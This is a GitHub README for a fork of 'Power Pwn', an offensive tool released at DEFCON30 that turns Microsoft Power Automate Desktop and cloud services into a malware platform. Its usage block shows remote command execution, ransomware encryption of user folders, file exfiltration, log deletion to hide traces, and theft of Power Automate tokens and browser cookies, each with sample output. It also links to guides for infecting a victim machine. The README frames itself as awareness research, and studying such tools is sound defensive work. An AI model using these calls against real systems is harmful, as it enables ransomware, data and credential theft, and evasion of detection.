GitHub - Pooch11/power-pwn: A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation
forked from mbrg/power-pwn
Power Pwn

Power Pwn is a demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

This tool was released as part of DEFCON30. For more details, see No-Code Malware: Windows 11 At Your Service.

Disclaimer: these materials are presented from an attacker's perspective with the goal of raising awareness of the risks of underestimating the security impact of No Code/Low Code. No Code/Low Code is awesome.

Usage

```python
from powerpwn.cli import PowerPwn

# Endpoint the PowerPwn client posts its commands to; left empty here,
# fill it in from your own cloud environment setup.
POST_URL = ""
pp = PowerPwn(post_url=POST_URL)

### code execution

# python2
pp.exec_py2("print('hello world')").CodeExec
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
pp.exec_py2("bad syntax").CodeExec
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
pp.exec_ps("Write-Host \"hello word\"").CodeExec

# commandline
pp.exec_cmd("echo \"hello word\"").CodeExec
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").Ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").Exfil
# ExfiltrationOutputs(Success=True, FileContents='asd')
pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").Exfil
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

pp.cleanup().Cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

pp.steal_power_automate_token().StealPowerAutomateToken
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie

pp.steal_cookie("https://www.google.com").StealCookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')
```

How To

How to set up your Power Pwn cloud environment

How to infect a victim machine

How to troubleshoot execution errors
